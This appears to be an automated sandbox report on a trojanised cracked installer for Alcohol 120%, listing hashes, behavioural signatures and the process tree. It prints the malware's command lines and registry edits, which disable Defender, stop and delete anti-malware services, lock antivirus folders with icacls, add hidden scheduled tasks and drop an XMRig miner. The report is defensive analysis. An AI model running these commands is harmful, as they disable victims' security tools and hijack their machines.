Overview
overview
10Static
static
7Alcohol_12...51.exe
windows7-x64
10Alcohol_12...51.exe
windows10-2004-x64
10Alcohol_12...32.dll
windows7-x64
1Alcohol_12...32.dll
windows10-2004-x64
1Alcohol_12...32.dll
windows7-x64
3Alcohol_12...32.dll
windows10-2004-x64
3Alcohol_12...32.dll
windows7-x64
1Alcohol_12...32.dll
windows10-2004-x64
1Alcohol_12...32.dll
windows7-x64
3Alcohol_12...32.dll
windows10-2004-x64
3Alcohol_12...ta.exe
windows7-x64
7Alcohol_12...ta.exe
windows10-2004-x64
7Alcohol_12...a0.exe
windows7-x64
1Alcohol_12...a0.exe
windows10-2004-x64
1Alcohol_12...ov.exe
windows7-x64
7Alcohol_12...ov.exe
windows10-2004-x64
7Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-06-2024 03:28
Behavioral task
behavioral1
Sample
Alcohol_120_v2.0.3/Alcohol.52.Free.Edition.v2.0.3.6951.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Alcohol_120_v2.0.3/Alcohol.52.Free.Edition.v2.0.3.6951.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-10.10.2014/msimg32.dll
Resource
win7-20240215-en
Behavioral task
behavioral4
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-10.10.2014/msimg32.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-19.11.2013/MSIMG32.dll
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-19.11.2013/MSIMG32.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-21.04.2015/msimg32.dll
Resource
win7-20240220-en
Behavioral task
behavioral8
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-21.04.2015/msimg32.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-25.12.2011/MSIMG32.dll
Resource
win7-20240419-en
Behavioral task
behavioral10
Sample
Alcohol_120_v2.0.3/CRACK/MSIMG32-25.12.2011/MSIMG32.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral11
Sample
Alcohol_120_v2.0.3/data.exe
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
Alcohol_120_v2.0.3/data.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
Alcohol_120_v2.0.3/data0.exe
Resource
win7-20240508-en
Behavioral task
behavioral14
Sample
Alcohol_120_v2.0.3/data0.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral15
Sample
Alcohol_120_v2.0.3/tool uninstall Alcohol/sptdremov.exe
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
Alcohol_120_v2.0.3/tool uninstall Alcohol/sptdremov.exe
Resource
win10v2004-20240508-en
General
-
Target
Alcohol_120_v2.0.3/Alcohol.52.Free.Edition.v2.0.3.6951.exe
-
Size
871KB
-
MD5
a801066da12e786c0277e70c191bc936
-
SHA1
2920b27e50c079f99502d2f574655e20657bdebd
-
SHA256
599297d2596c79c0f43b555a88a77f7f89943397298a60cf7fc991b6d0e696c3
-
SHA512
31292e5ebebb03de4018b04a28324c65e36656472cdc98328ad4f77544a762f5f0c397b6f12c886272fc08f4d9fa7579560e0cf33f02e19af4fd7e7731d619d8
-
SSDEEP
12288:GCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBgasLvhpFQ:GCdxte/80jYLT3U1jfsWasDbFQ
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection update.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" update.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhost.exe -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023468-545.dat xmrig -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" update.exe Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" update.exe Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" update.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts update.exe -
Modifies Windows Firewall 2 TTPs 5 IoCs
pid Process 2252 netsh.exe 3980 netsh.exe 1376 netsh.exe 1860 netsh.exe 1224 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation update.exe Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation taskhost.exe -
Executes dropped EXE 7 IoCs
pid Process 1228 update.exe 2184 taskhost.exe 1224 taskhostw.exe 3552 taskhost.exe 1984 winlogon.exe 2688 MicrosoftHost.exe 2948 taskhostw.exe -
Modifies file permissions 1 TTPs 56 IoCs
pid Process 688 icacls.exe 216 icacls.exe 2560 icacls.exe 4772 icacls.exe 3960 icacls.exe 4800 icacls.exe 1620 icacls.exe 1896 icacls.exe 1976 icacls.exe 3444 icacls.exe 3064 icacls.exe 3484 icacls.exe 1652 icacls.exe 1032 icacls.exe 952 icacls.exe 5092 icacls.exe 3384 icacls.exe 1380 icacls.exe 2180 icacls.exe 2644 icacls.exe 5080 icacls.exe 4444 icacls.exe 4976 icacls.exe 1896 icacls.exe 1372 icacls.exe 2340 icacls.exe 1172 icacls.exe 364 icacls.exe 1864 icacls.exe 2500 icacls.exe 1864 icacls.exe 3040 icacls.exe 3952 icacls.exe 4368 icacls.exe 1640 icacls.exe 1416 icacls.exe 4060 icacls.exe 4944 icacls.exe 2956 icacls.exe 4976 icacls.exe 1992 icacls.exe 2508 icacls.exe 1204 icacls.exe 1968 icacls.exe 2568 icacls.exe 1932 icacls.exe 1720 icacls.exe 3580 icacls.exe 416 icacls.exe 2412 icacls.exe 4064 icacls.exe 876 icacls.exe 1840 icacls.exe 2340 icacls.exe 4036 icacls.exe 3212 icacls.exe -
resource yara_rule behavioral2/files/0x000a000000023391-526.dat upx behavioral2/memory/1984-533-0x00000000004F0000-0x00000000005DC000-memory.dmp upx behavioral2/memory/1984-539-0x00000000004F0000-0x00000000005DC000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 37 iplogger.org 38 iplogger.org -
Modifies WinLogon 2 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts update.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" update.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList update.exe -
AutoIT Executable 5 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000800000002343d-4.dat autoit_exe behavioral2/files/0x000900000002338a-22.dat autoit_exe behavioral2/files/0x0007000000023467-46.dat autoit_exe behavioral2/files/0x0009000000023393-190.dat autoit_exe behavioral2/memory/1984-539-0x00000000004F0000-0x00000000005DC000-memory.dmp autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 taskhost.exe -
Drops file in Program Files directory 21 IoCs
description ioc Process File opened for modification C:\Program Files\Cezurity update.exe File opened for modification C:\Program Files (x86)\Microsoft JDX update.exe File opened for modification C:\Program Files (x86)\360 update.exe File opened for modification C:\Program Files (x86)\SpyHunter update.exe File opened for modification C:\Program Files\Malwarebytes update.exe File opened for modification C:\Program Files\Enigma Software Group update.exe File opened for modification C:\Program Files\SpyHunter update.exe File opened for modification C:\Program Files\Kaspersky Lab update.exe File opened for modification C:\Program Files\Common Files\McAfee update.exe File opened for modification C:\Program Files (x86)\Panda Security update.exe File created C:\Program Files\Common Files\System\iediagcmd.exe update.exe File opened for modification C:\Program Files\AVG update.exe File opened for modification C:\Program Files\ByteFence update.exe File opened for modification C:\Program Files\COMODO update.exe File opened for modification C:\Program Files\AVAST Software update.exe File opened for modification C:\Program Files (x86)\AVG update.exe File opened for modification C:\Program Files (x86)\AVAST Software update.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab update.exe File opened for modification C:\Program Files (x86)\Cezurity update.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus update.exe File opened for modification C:\Program Files\ESET update.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4608 sc.exe 4852 sc.exe 416 sc.exe 3996 sc.exe 4332 sc.exe 564 sc.exe 4936 sc.exe 548 sc.exe 1768 sc.exe 1636 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4332 schtasks.exe 2252 schtasks.exe 3200 schtasks.exe 4992 schtasks.exe 2012 schtasks.exe 4120 schtasks.exe 2688 schtasks.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 4660 ipconfig.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Setup\WinMgmts:\ update.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1228 update.exe 1228 update.exe 1228 update.exe 1228 update.exe 1228 update.exe 1228 update.exe 1228 update.exe 1228 update.exe 1228 update.exe 1228 update.exe 2184 taskhost.exe 2184 taskhost.exe 1228 update.exe 1228 update.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe 3552 taskhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1224 taskhostw.exe 3552 taskhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 2688 MicrosoftHost.exe Token: SeLockMemoryPrivilege 2688 MicrosoftHost.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1228 update.exe 2184 taskhost.exe 1224 taskhostw.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 208 wrote to memory of 2008 208 Alcohol.52.Free.Edition.v2.0.3.6951.exe 83 PID 208 wrote to memory of 2008 208 Alcohol.52.Free.Edition.v2.0.3.6951.exe 83 PID 208 wrote to memory of 2008 208 Alcohol.52.Free.Edition.v2.0.3.6951.exe 83 PID 2008 wrote to memory of 1228 2008 data0.bin 84 PID 2008 wrote to memory of 1228 2008 data0.bin 84 PID 2008 wrote to memory of 1228 2008 data0.bin 84 PID 1228 wrote to memory of 2184 1228 update.exe 96 PID 1228 wrote to memory of 2184 1228 update.exe 96 PID 1228 wrote to memory of 2184 1228 update.exe 96 PID 1228 wrote to memory of 4992 1228 update.exe 97 PID 1228 wrote to memory of 4992 1228 update.exe 97 PID 1228 wrote to memory of 4992 1228 update.exe 97 PID 1228 wrote to memory of 2012 1228 update.exe 100 PID 1228 wrote to memory of 2012 1228 update.exe 100 PID 1228 wrote to memory of 2012 1228 update.exe 100 PID 1228 wrote to memory of 4120 1228 update.exe 102 PID 1228 wrote to memory of 4120 1228 update.exe 102 PID 1228 wrote to memory of 4120 1228 update.exe 102 PID 1228 wrote to memory of 2688 1228 update.exe 105 PID 1228 wrote to memory of 2688 1228 update.exe 105 PID 1228 wrote to memory of 2688 1228 update.exe 105 PID 1228 wrote to memory of 3812 1228 update.exe 106 PID 1228 wrote to memory of 3812 1228 update.exe 106 PID 1228 wrote to memory of 3812 1228 update.exe 106 PID 3812 wrote to memory of 4332 3812 cmd.exe 109 PID 3812 wrote to memory of 4332 3812 cmd.exe 109 PID 3812 wrote to memory of 4332 3812 cmd.exe 109 PID 1228 wrote to memory of 4304 1228 update.exe 110 PID 1228 wrote to memory of 4304 1228 update.exe 110 PID 1228 wrote to memory of 4304 1228 update.exe 110 PID 4304 wrote to memory of 564 4304 cmd.exe 112 PID 4304 wrote to memory of 564 4304 cmd.exe 112 PID 4304 wrote to memory of 564 4304 cmd.exe 112 PID 1228 wrote to memory of 1672 1228 update.exe 113 PID 1228 wrote to memory of 1672 1228 update.exe 113 PID 1228 wrote to memory of 1672 1228 update.exe 113 PID 1672 wrote to memory of 4936 1672 cmd.exe 115 PID 1672 wrote to memory of 4936 1672 cmd.exe 115 PID 1672 wrote to memory of 4936 1672 cmd.exe 115 PID 1228 wrote to memory of 2912 1228 update.exe 116 PID 1228 wrote to memory of 2912 1228 update.exe 116 PID 1228 wrote to memory of 2912 1228 update.exe 116 PID 2912 wrote to memory of 4608 2912 cmd.exe 118 PID 2912 wrote to memory of 4608 2912 cmd.exe 118 PID 2912 wrote to memory of 4608 2912 cmd.exe 118 PID 1228 wrote to memory of 4868 1228 update.exe 119 PID 1228 wrote to memory of 4868 1228 update.exe 119 PID 1228 wrote to memory of 4868 1228 update.exe 119 PID 4868 wrote to memory of 548 4868 cmd.exe 121 PID 4868 wrote to memory of 548 4868 cmd.exe 121 PID 4868 wrote to memory of 548 4868 cmd.exe 121 PID 1228 wrote to memory of 1380 1228 update.exe 122 PID 1228 wrote to memory of 1380 1228 update.exe 122 PID 1228 wrote to memory of 1380 1228 update.exe 122 PID 1380 wrote to memory of 4852 1380 cmd.exe 124 PID 1380 wrote to memory of 4852 1380 cmd.exe 124 PID 1380 wrote to memory of 4852 1380 cmd.exe 124 PID 1228 wrote to memory of 1248 1228 update.exe 125 PID 1228 wrote to memory of 1248 1228 update.exe 125 PID 1228 wrote to memory of 1248 1228 update.exe 125 PID 1248 wrote to memory of 1768 1248 cmd.exe 127 PID 1248 wrote to memory of 1768 1248 cmd.exe 127 PID 1248 wrote to memory of 1768 1248 cmd.exe 127 PID 1228 wrote to memory of 4996 1228 update.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.binC:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1228 -
C:\ProgramData\Setup\taskhost.exeC:\ProgramData\Setup\taskhost.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2184 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
PID:2508
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:4332
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:2252
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:3200
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4992
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:4120
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST4⤵
- Creates scheduled task(s)
PID:2688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵
- Suspicious use of WriteProcessMemory
PID:3812 -
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
- Launches sc.exe
PID:4332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\SysWOW64\sc.exesc start appmgmt5⤵
- Launches sc.exe
PID:564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
- Launches sc.exe
PID:4936
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
- Launches sc.exe
PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
- Launches sc.exe
PID:548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
- Launches sc.exe
PID:4852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
- Launches sc.exe
PID:1768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵PID:4996
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
- Launches sc.exe
PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵PID:4860
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
- Launches sc.exe
PID:416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵PID:3464
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
- Launches sc.exe
PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵PID:3852
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
- Modifies Windows Firewall
PID:2252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵PID:1916
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:3980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵PID:1396
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵PID:4120
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:1860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵PID:3692
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
- Modifies Windows Firewall
PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)4⤵PID:3040
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵PID:4576
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)4⤵PID:5084
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:2500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵PID:3212
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)4⤵PID:5012
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1416
-
-
-
